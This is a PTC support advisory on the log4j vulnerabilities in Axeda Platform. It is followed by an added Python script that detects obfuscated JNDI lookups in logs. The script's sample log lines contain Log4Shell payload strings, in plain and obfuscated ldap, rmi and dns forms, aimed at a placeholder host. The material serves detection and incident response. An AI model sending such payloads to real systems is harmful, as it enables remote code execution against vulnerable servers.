Article - CS358990

PTC Axeda Products Apache log4j vulnerability - Incident Response

Modified: 10-Jan-2022   


Applies To

  • Axeda - Platform 6.9.2

Description

  • Customer alert and remediation recommendations for the Apache log4j vulnerabilities CVE-2021-44228, CVE-2021-45105, CVE-2021-4104, CVE-2019-17571 and CVE-2021-44832
  • These vulnerabilities are in a third-party library that PTC software uses to log application errors, events and associated information
  • If exploited, the vulnerabilities allow remote, potentially malicious code execution in your environments.
  • Until a patched release is available, there may be configuration settings that remove the vulnerability; PTC recommends applying them immediately to the PTC Axeda installations and components identified in this article
  • The following vulnerabilities have been reported in Log4j 2.x:
    • CVE-2021-44228:
      • Description: The Log4j JNDI lookup feature does not protect against attacker-controlled LDAP and other JNDI endpoints. An attacker who can get a crafted lookup string into a logged message or message parameter can make the application load and execute code from a server they control (remote code execution, RCE).
    • CVE-2021-45105:
      • Description: Log4j 2.x does not protect against uncontrolled recursion from self-referential lookups. An attacker who controls the input to such a lookup can trigger a stack overflow and cause a denial of service (DoS).
    • CVE-2021-44832:
      • Description: An attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender whose data source references a JNDI URI, which can execute remote code.
  • The following vulnerabilities have been reported in Log4j 1.x:
    • CVE-2021-4104:
      • Description: A JMSAppender configured with TopicBindingName and TopicConnectionFactoryBindingName performs JNDI requests and deserializes untrusted data, which can result in remote code execution (RCE). Exploitation requires write access to the Log4j configuration.
    • CVE-2019-17571:
      • Description: The SocketServer class, which accepts serialized log events over the network, deserializes untrusted data and can be exploited for remote code execution (RCE) by anyone who can reach its listening port.
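For incident response on CVE-2021-44228, a first step is to find which requests carried a JNDI lookup string. Attackers routinely hide the literal `${jndi:` behind nested lookups (`${lower:j}`, `${upper:n}`, `${::-j}`, `${env:X:-n}`), so a plain string match misses them. The following Python script is an added example, not part of this PTC article and not PTC or Apache code: it peels those obfuscation forms off innermost-first and then reports the JNDI URI scheme. The access-log lines are constructed for the example; the IP addresses and hostnames in them are placeholders, and the `_resolve`, `normalize`, `find_jndi` and `scan_log` names are this example's own.

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...} lookup: a body that contains no further "${" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once obfuscation is removed; group 1 is the URI scheme.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z][A-Za-z0-9+.-]*)", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Resolve one innermost lookup body to the literal text it expands to.

    Only the forms commonly used to hide "jndi" are modelled: ${lower:X},
    ${upper:X} and ${anything:-default}. Real Log4j lookups (env, sys, ctx,
    date, ...) are not evaluated; they are left in place unchanged.
    """
    low = body.lower()
    if low.startswith("jndi:"):
        # Never rewrite a JNDI lookup itself, even if its URI contains ":-".
        return None
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${key:-default}: the attacker relies on "key" failing to resolve so
        # that the text after ":-" is substituted. ${::-j} -> "j".
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """Expand innermost obfuscation lookups, innermost first, until nothing
    changes. The round limit keeps a hostile input from looping forever."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi(text: str) -> Optional[str]:
    """Return the JNDI URI scheme (ldap, rmi, dns, ...) if the text contains a
    JNDI lookup after de-obfuscation, otherwise None."""
    m = JNDI.search(normalize(text))
    return m.group(1).lower() if m else None


def scan_log(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan log lines; return (line_no, scheme, normalized_line) for each hit."""
    hits = []
    for i, line in enumerate(lines, 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme, normalize(line)))
    return hits


# Constructed sample access-log lines (not real traffic): three probes with
# increasing obfuscation in the User-Agent field, then one benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:14:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:r}mi://203.0.113.9:1099/x}"',
    '10.0.0.7 - - [10/Dec/2021:14:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${env:NOPE:-n}${::-d}${::-i}:${upper:dns}://203.0.113.9/z}"',
    '10.0.0.8 - - [10/Dec/2021:14:01:12 +0000] "GET /health HTTP/1.1" 200 2 '
    '"-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, scheme, shown in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: jndi scheme={scheme}\n    {shown}")
```

Run the script against exported web, proxy or application logs one line at a time; a hit tells you the scheme the attacker used (ldap, rmi, dns and so on), which is the next pivot for outbound-connection review. The resolver deliberately does not evaluate real lookups such as `${env:...}` or `${sys:...}`, so a string that only becomes `jndi` after a lookup against the target's own environment will not be flagged; treat any remaining unresolved `${...}` in a request as suspicious on its own.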
This is a PDF version of Article CS358990 and may be out of date. For the latest version click https://www.ptc.com/en/support/article/CS358990